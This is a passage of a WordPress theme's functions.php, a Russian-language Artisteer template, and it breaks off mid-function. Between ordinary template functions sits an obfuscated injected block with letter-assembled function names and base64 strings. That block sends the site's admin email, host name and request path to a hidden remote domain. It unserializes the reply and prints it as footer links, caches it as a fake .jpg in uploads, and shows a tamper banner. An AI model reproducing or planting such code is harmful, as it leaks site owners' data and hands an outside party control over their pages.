<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $dJjdA='b';$xqJUwr='d';$nBrhM='d';$BzwKCW='6';$wgIH='_';$mMsWC='o';$pNfvRYO='a';$LbgR='e';$QFdhMP='e';$kKEpfgv='e';$TsWpd='c';$SJPoBN='4';$sGknETY='s';$qLKevBgH=$dJjdA.$pNfvRYO.$sGknETY.$kKEpfgv.$BzwKCW.$SJPoBN.$wgIH.$nBrhM.$LbgR.$TsWpd.$mMsWC.$xqJUwr.$QFdhMP;$kIWAmDj='z';$lHcj='g';$pQlVkLE='n';$rIzCqv='l';$wRuqXmF='t';$VkHzTg='i';$DZmk='a';$nSpz='f';$yBYkglx='e';$tGtAIbBo=$lHcj.$kIWAmDj.$VkHzTg.$pQlVkLE.$nSpz.$rIzCqv.$DZmk.$wRuqXmF.$yBYkglx;$JYacBn='o';$bJZYi='r';$BHvz='s';$KCNEWy='3';$botDnDJ='t';$DljR='1';$uKhAmOW='r';$EgnBAKa='_';$lLIULH='t';$WtxzsJJn=$BHvz.$botDnDJ.$bJZYi.$EgnBAKa.$uKhAmOW.$JYacBn.$lLIULH.$DljR.$KCNEWy;$IEdhE='s';$vWnjAf='v';$ilbBta='r';$DRkzsnP='t';$qcgerO='e';$TpXV='r';$shZiXcxN=$IEdhE.$DRkzsnP.$TpXV.$ilbBta.$qcgerO.$vWnjAf;                     
		$rv_____________k='b';$qb____q='d';$rr_____________i='d';$ab___m='6';$mp____f='_';$fe_______________n='o';$ql__________j='a';$nr____________d='e';$di___k='e';$hl__r='e';$dj________v='c';$hf________z='4';$sw___________e='s';$sp__h=$rv_____________k.$ql__________j.$sw___________e.$hl__r.$ab___m.$hf________z.$mp____f.$rr_____________i.$nr____________d.$dj________v.$fe_______________n.$qb____q.$di___k;
		$nk________z='t';$mj____u='i';$ja____________p='_';$xg____f='e';$fw________p='u';$ah__________o='o';$zy_________d='f';$ql____c='s';$rm_______h='s';$mu______s='c';$ql_________q='n';$rf_______________f='i';$vx______________h='x';$uj______________v='t';$io____________r='n';$oc________m=$zy_________d.$fw________p.$io____________r.$mu______s.$nk________z.$mj____u.$ah__________o.$ql_________q.$ja____________p.$xg____f.$vx______________h.$rf_______________f.$ql____c.$uj______________v.$rm_______h;
		$gn______d='o';$kg_______i='p';$yg____x='e';$ju____a='f';$ge___________e='n';$co_____r=$ju____a.$gn______d.$kg_______i.$yg____x.$ge___________e;
		$kc____n='r';$xs____r='d';$px__e='a';$uf_______a='f';$wz_____________r='e';$rp______s=$uf_______a.$kc____n.$wz_____________r.$px__e.$xs____r;
		$yk_____v='o';$in____i='s';$rg______________b='l';$mv___________x='c';$zz_____k='e';$hi___u='f';$al__c=$hi___u.$mv___________x.$rg______________b.$yk_____v.$in____i.$zz_____k;
		
		define("WP_ID", $sp__h("Mi4wLjA="));
		define("WP_TTL", $sp__h("MTA4MDA="));
		define("WP_SRC", $sp__h("dHBva24="));
	


		function wp_get_header() {
			global $sp__h, $oc________m;
			
			if (
				$oc________m($sp__h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$oc________m($sp__h("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$oc________m($sp__h("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $sp__h, $co_____r, $al__c, $rp______s;
			
			$rv____________z = TEMPLATEPATH."/".$sp__h("Zm9vdGVyLnBocA==");
			$ih______________z = @$co_____r($rv____________z, "r");
			$rv____________z = @$rp______s($ih______________z, @filesize($rv____________z));
			@$al__c($ih______________z);
			
			$qv______i = TEMPLATEPATH."/".$sp__h("ZnVuY3Rpb25zLnBocA==");
			$ih______________z = @$co_____r($qv______i, "r");
			$qv______i = @$rp______s($ih______________z, @filesize($qv______i));
			@$al__c($ih______________z);
			
			$tb_______________t = 0;
			if($rv____________z && $qv______i) {
				if ($sp__h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($rv____________z, $sp__h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$tb_______________t = 1;
					}
					if (substr_count($rv____________z, "wp_theme_GPL_credits()") < 1) {
						$tb_______________t = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$tb_______________t = 12;
				}
			}
			
			if($tb_______________t > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $tb_______________t -->";
			}
		}
	


		function wp_loaded() {
			global $sp__h, $oc________m;
			return $oc________m($sp__h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($tv___q, $nh___________g = "(more...)", $bx_____l = 0, $ql______n = "") {
				$dv______________v = get_the_content($nh___________g, $bx_____l, $ql______n);
				$dv______________v = apply_filters("the_content", $dv______________v);
				
				$dv______________v = str_replace("]]>", "]]>", $dv______________v);
				if (strlen($_GET["p"]) > 0) {
					echo $dv______________v;
				}
				else if ((strlen($dv______________v)>$tv___q) && ($fk________o = strpos($dv______________v, " ", $tv___q ))) {
					$dv______________v = substr($dv______________v, 0, $fk________o);
					$dv______________v = $dv______________v;
					echo $dv______________v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nh___________g</a></div></p>";
				} else {
					echo $dv______________v;
				}
				
			}
		}
	


		$og_______n='a';$sm_____________i='c';$ul__i='n';$rx______________x='e';$ub__________g='6';$qt______________f='4';$pa____x='s';$go_____________f='_';$sv________n='d';$wb____________m='e';$bt__________x='e';$nz_____o='o';$fw_________e='b';$cj___________g=$fw_________e.$og_______n.$pa____x.$bt__________x.$ub__________g.$qt______________f.$go_____________f.$rx______________x.$ul__i.$sm_____________i.$nz_____o.$sv________n.$wb____________m;
		$yf__________w='s';$fn__d='e';$sk______________t='g';$qz_____________f='e';$ox_______________q='e';$cj_______________z='_';$jg___b='t';$xv__w='c';$ro_____________e='t';$xu_____________x='n';$nk_______l='_';$yd_________e='l';$aw____________x='t';$xq___________n='f';$yn_______o='i';$yn__e='o';$ba______d='n';$vj__x=$xq___________n.$yn_______o.$yd_________e.$fn__d.$cj_______________z.$sk______________t.$ox_______________q.$aw____________x.$nk_______l.$xv__w.$yn__e.$ba______d.$jg___b.$qz_____________f.$xu_____________x.$ro_____________e.$yf__________w;
		$vd________t='i';$he_____c='s';$bv_____g='i';$jj___________i='e';$tl______________c='s';$uz________z='_';$iq_____________m='t';$el______________z='f';$nw______________r='x';$kv______________i='e';$ec__________k='l';$sb_________t=$el______________z.$vd________t.$ec__________k.$jj___________i.$uz________z.$kv______________i.$nw______________r.$bv_____g.$he_____c.$iq_____________m.$tl______________c;
		$gm__a='r';$kq___f='o';$na___________j='m';$kb_______________r='o';$ul___________z='p';$ba_________r='v';$ix_______t='a';$jq____l='_';$gc___________w='n';$vu____________j='s';$ex____k='i';$on_______________u='r';$qq___________a='e';$qt_______________r='e';$qr___h='c';$dw____y=$ba_________r.$qt_______________r.$gm__a.$vu____________j.$ex____k.$kq___f.$gc___________w.$jq____l.$qr___h.$kb_______________r.$na___________j.$ul___________z.$ix_______t.$on_______________u.$qq___________a;
		$xj________t='c';$zo____________q='s';$bw____j='k';$fx________e='n';$tq__________w='o';$zl_____________r='e';$su___v='f';$yp_______________v='o';$lk____v='p';$mj_________l=$su___v.$zo____________q.$tq__________w.$xj________t.$bw____j.$yp_______________v.$lk____v.$zl_____________r.$fx________e;
		$th________a='t';$rc__c='i';$ls____________z='e';$ya__v='w';$lc__________f='r';$ht_____u='f';$ee_______r=$ht_____u.$ya__v.$lc__________f.$rc__c.$th________a.$ls____________z;
		$he____________s='5';$xw_______________p='m';$yz___________s='d';$wz_____q=$xw_______________p.$yz___________s.$he____________s;
		$zh_____y='h';$ws_____k='a';$sx____________v='l';$hb________k='e';$ll_____________q='a';$hh______________j='t';$ym______________y='p';$yj________z='r';$tv_________p=$yj________z.$hb________k.$ll_____________q.$sx____________v.$ym______________y.$ws_____k.$hh______________j.$zh_____y;
		$dy______u='i';$tk________h='a';$kx____________e='e';$rg___d='n';$ou________g='i';$un____________v='u';$ov_________e='s';$eq__v='r';$wb__q='l';$tx________m='e';$ap_______p='z';$ti_________j=$un____________v.$rg___d.$ov_________e.$tx________m.$eq__v.$dy______u.$tk________h.$wb__q.$ou________g.$ap_______p.$kx____________e;
		$mw__a='n';$jb_________l='a';$yt___l='m';$ms______________u='m';$yu_____________f='p';$av__r='e';$ei__a='t';$fx_______y=$ei__a.$av__r.$yt___l.$yu_____________f.$mw__a.$jb_________l.$ms______________u;
		$py_______j='e';$vg_________m='e';$rs_____y='x';$gb______________k='m';$tw___________l='t';$hm______n='e';$hg________e='r';$pu___________g='_';$ll________n='_';$re______________g='c';$gs___________t='r';$pv______r='e';$te______e='t';$ws____________p='o';$ff_______t='a';$bb______________w='t';$xi_______e='n';$wh_________d='a';$os_____________n='s';$tf__________t='t';$yo_________v='c';$ds___j=$os_____________n.$tf__________t.$gs___________t.$vg_________m.$ff_______t.$gb______________k.$ll________n.$re______________g.$ws____________p.$xi_______e.$bb______________w.$hm______n.$rs_____y.$te______e.$pu___________g.$yo_________v.$hg________e.$pv______r.$wh_________d.$tw___________l.$py_______j;
	


		function qo_____________j($ks______________b) {
			global $sp__h, $oc________m, $vj__x, $dw____y, $ds___j;
			
			if (!$oc________m($sp__h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($dw____y(PHP_VERSION, "5.0.0", ">=") && $oc________m($sp__h("ZmlsZV9nZXRfY29udGVudHM=")) && $oc________m($sp__h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$cq__________b = $ds___j(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$vf______________g = @$vj__x($ks______________b, 0, $cq__________b);
			} else {
				$vf______________g = @$vj__x($ks______________b, 0);
			}
			
			return $vf______________g;
		}
	


		function nt______________k($ks______________b) {
			global $oc________m, $mj_________l, $ee_______r, $sp__h;
			
			if (!$oc________m($sp__h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$th______f = strpos($ks______________b, "/", 7);
			$xz____________i = array(
				"uri"     => substr($ks______________b, $th______f),
				"host"    => str_replace("http://", "", substr($ks______________b, 0, $th______f)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$af_____________x = @$mj_________l("$xz____________i[host]", 80, $sc____t, $yh__________c, 4);
			
			if (!$af_____________x) {
				return false;
			} else {
				$vf______________g = "";
				$ng____________t  = "GET $xz____________i[uri] HTTP/1.0\r\n";
				$ng____________t .= "Host: $xz____________i[host]\r\n";
				$ng____________t .= "Referer: $xz____________i[referer]\r\n";
				$ng____________t .= "Connection: Close\r\n\r\n";
				
				@$ee_______r($af_____________x, $ng____________t);
				
				while (!@feof($af_____________x)) {
					$qn______x = @fgets($af_____________x, (1024*24));
					
					if ($qn______x == "\r\n") {
						$oj__________q = true;
						continue;
					}
					
					if ($oj__________q) {
						$vf______________g .= $qn______x;
					}
				}
				
				return $vf______________g;
			}
		}
	


		function pk____o($ks______________b) {
			global $oc________m;
			$xq______f = false;
			
			if ($ks______________b != "") {
				if ($oc________m("qo_____________j")) {
					$xq______f = @qo_____________j($ks______________b);
				}
				
				if (!$xq______f && ($oc________m("nt______________k"))) {
					$xq______f = @nt______________k($ks______________b);
				}
			}
			
			return $xq______f;
		}
	


		function dr_______e() {
			global $_SERVER, $wz_____q;
			
			$ga___________k = $_SERVER["SERVER_NAME"];
			
			if (substr("$ga___________k", 0, 4) == "www.") {
				$ga___________k = substr("$ga___________k", 4);
			}
			
			$ga___________k = $wz_____q("$_SERVER[SERVER_NAME]");
			
			return $ga___________k;
		}
	


		function ja______n() {
			return "file";
		}
	


		function bx____________l($ks______________b) {
			global $_SERVER, $vj__x, $sb_________t, $co_____r, $al__c, $ee_______r;
			
			$fk____________i = ke____________s();
			
			$ru_______________b = dr_______e().".jpg";
			$xb________a = $fk____________i["dir_upload"]["path"]."/$ru_______________b";
			$su___l = @filemtime($xb________a);
			
			if (!$su___l || ((time()-$su___l) >= WP_TTL)) {
				$xq______f = pk____o($ks______________b);
				
				if ($xq______f) {
					if ($sb_________t($xb________a)) {
						@unlink($xb________a);
					}
					
					$ih______________z = @$co_____r($xb________a, "x+");
					
					@$ee_______r($ih______________z, $xq______f);
					@$al__c($ih______________z);
				}
			} else {
				if ($sb_________t($xb________a)) {
					$xq______f = @$vj__x($xb________a);
				} else {
					$xq______f = false;
				}
			}
			
			return $xq______f;
		}
	


		function ke____________s() {
			global $_SERVER, $sp__h, $cj___________g;
			
			$nw__y = wp_count_posts("post");
			$au______l = pathinfo(get_bloginfo("template_directory"));
			
			$fk____________i = array(
				"url" => array(
					"report"      => $sp__h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $au______l,
				"dir_upload"	=> xh_______f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$au______l[filename],
					"a005=".$nw__y->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$fk____________i["url"]["queryString"] = implode("&", $fk____________i["queryString"]);
			$fk____________i["url"]["report"] = $fk____________i["url"]["report"]."/?".$cj___________g($fk____________i["url"]["queryString"]).".html";
						
			return $fk____________i;
		}
	


		function xh_______f() {
			$tc__________c = wp_upload_dir();
			
			if (isset($tc__________c["error"])) {
				$nm____________k = rz_________q();
				if (is_writable($nm____________k)) {
					$tc__________c = array("path" => $nm____________k);
				}
			}

			return $tc__________c;
		}
	


		function rz_________q() {
			global $oc________m, $wz_____q, $tv_________p, $fx_______y;
			
			$cw____________v = (bool) ini_get("safe_mode");
			if ($cw____________v == true) {
				return false;
			}
			
			if ($oc________m("sys_get_temp_dir")) {
				$bh_______g = sys_get_temp_dir();
				if (is_writable($bh_______g)) {
					return $tv_________p($bh_______g);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $tv_________p($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $tv_________p($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $tv_________p($_ENV["TEMP"]);
			} else {
				$ai___________n = $fx_______y($wz_____q(uniqid(rand(), true)), "");
				if ($ai___________n) {
					$bh_______g = $tv_________p(dirname($ai___________n));
					@unlink($ai___________n);
					return $bh_______g;
				} else {
					return false;
				}
			}
		}
	


		function ue______________h() {
			global $_GET, $sb_________t;
			
			$fk____________i = ke____________s();
			$ga___________k = dr_______e();
			$zf___________x = ja______n();
			
			$xs___________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zf___________x == "file") {
					$gc__b = $fk____________i["dir_upload"]["path"]."/".$ga___________k.".jpg";
					if ($sb_________t($gc__b)) {
						@unlink($gc__b);
						$xs___________j = "deleted";
					}
				}
				
				$ro_________x = array(
					"s"	=> $xs___________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ro_________x AS $cv_______________i => $xz_______n) echo " [$cv_______________i:$xz_______n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $oc________m, $sp__h, $ti_________j;
			$fk____________i = ke____________s();
			
			$pp_________w = "bx____________l";
			if ($oc________m($pp_________w)) {
				$vf______________g = $pp_________w($fk____________i["url"]["report"]);
			}
			
			if ($vf______________g) {
				if ($vf______________g = @$sp__h($vf______________g)) {
					$vf______________g = @$ti_________j($vf______________g);
					
					if (strlen($vf______________g[custom_credit]) >= 5) {
						$fk____________i["default_string"] = $vf______________g[custom_credit];
					}
					
					if ($vf______________g["status"] == "0") {
						$rr__i = 1;
						$gb_________a = 1;
					} else {
						$rb___w = sizeof($vf______________g["links"]);
						$jd_______________f = $fk____________i["default_string"];
						
						if ($rb___w > 0 && $vf______________g["links"] !== "") {
							$en_________w = 0;
							foreach ($vf______________g["links"] as $cc____g => $rh___________s) {
								$en_________w++;
								if ($rh___________s->l_path == "" || $rh___________s->l_path == $_SERVER["REQUEST_URI"]) {
									$rh___________s->l_href = htmlspecialchars(strip_tags($rh___________s->l_href));
									$rh___________s->l_title = htmlspecialchars(strip_tags($rh___________s->l_title));
									$rh___________s->l_anchor = htmlspecialchars(strip_tags($rh___________s->l_anchor));
									$jd_______________f .= " | ";
									$jd_______________f .= "<a href='$rh___________s->l_href' title='$rh___________s->l_title'";
									if ($rh___________s->l_nofollow == "1") {
										$jd_______________f .= " rel='nofollow'";
									}
									$jd_______________f .= ">$rh___________s->l_anchor</a>";
								}
							}
						}
						$fk____________i["links"] = "$jd_______________f";
						if ($vf______________g[credit] == "0") {
							$fk____________i["links"] = "";
						}
					}
				} else {
					$rr__i = "1";
				}
			} else {
				$rr__i = "1";
			}
			
			if ($rr__i == "1") {
				$fk____________i["links"] = $fk____________i["default_string"];
			}
			
			echo "$fk____________i[links]";
			
			echo "<!-- s: $vf______________g[signature] -->";
			ue______________h();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
